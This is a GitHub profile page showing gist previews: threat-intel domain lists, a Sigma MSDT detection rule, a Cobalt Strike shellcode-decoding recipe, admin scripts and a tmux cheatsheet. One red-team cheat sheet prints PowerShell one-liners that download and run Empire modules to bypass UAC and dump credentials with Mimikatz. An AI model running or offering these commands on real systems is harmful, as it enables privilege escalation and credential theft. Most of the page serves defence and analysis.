Skip to content

Instantly share code, notes, and snippets.

View phroxvs's full-sized avatar

Marc Ströbel phroxvs

7 followers · 5 following
  • HvS-Consulting AG
  • Munich, Germany
View GitHub Profile
@qbourgue
qbourgue / malvertising_infra_distributing_netsupport_rat.md
Created May 2, 2024 21:22

Malicious websites impersonating legitimate software

Domain names:

138.124.183.79.sslip.io
7-zip.cfd
7-zip.day
advanced-ip-scanner.cfd
advanced-ip-scanner.link
advancedipscannerapp.com
@kevthehermit
kevthehermit / detection.yml
Last active September 16, 2022 22:55
Office --> MSDT --> RCE
title: Sysmon Office MSDT
id: c95ed569-5da4-48b3-9698-5e429964556c
description: Detects MSDT Exploit Attempts
status: experimental
author: kevthehermit
date: 2022/05/30
references:
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
- https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
logsource:
@0xtornado
0xtornado / 0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
Created April 30, 2020 14:11
CyberChef recipe to extract and decode Shellcode from a Cobalt Strike beacon
[{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}]
@jivoi
jivoi / RedTeam_CheatSheet.ps1
Created July 14, 2018 14:52 — forked from m8sec/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@ethzero
ethzero / PSFileTransferByClipboard.ps1
Last active August 22, 2023 11:45
Transferring binary content by way of clipboard via Powershell
## Powershell method of transfering small (< 1 MB) binary files via Clipboard
##
## NB: Unwise to attempt to encode binary files exceeding 1 MB due to excessive memory consumption
## Powershell 5.0>
# On the transmission end:
$Content = Get-Content -Encoding Byte -Path binaryfile.xxx
[System.Convert]::ToBase64String($Content) | Set-Clipboard
# On the receiving end
@jschpp
jschpp / oab.ps1
Last active November 16, 2022 09:21
Deletes OAB locally and deactivates automatic OAB download for prompted user
# This script remove the local Offline Address Book files and sets the
# registry key to disable automatic download of the OAB
$OFS = "`r`n`r`n"
[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') | Out-Null
try {
$username = [Microsoft.VisualBasic.Interaction]::InputBox("Input username", "User", "")
$User = New-Object System.Security.Principal.NTAccount($username)
$sid = $User.Translate([System.Security.Principal.SecurityIdentifier]).value
} catch {
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active July 2, 2024 13:33
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname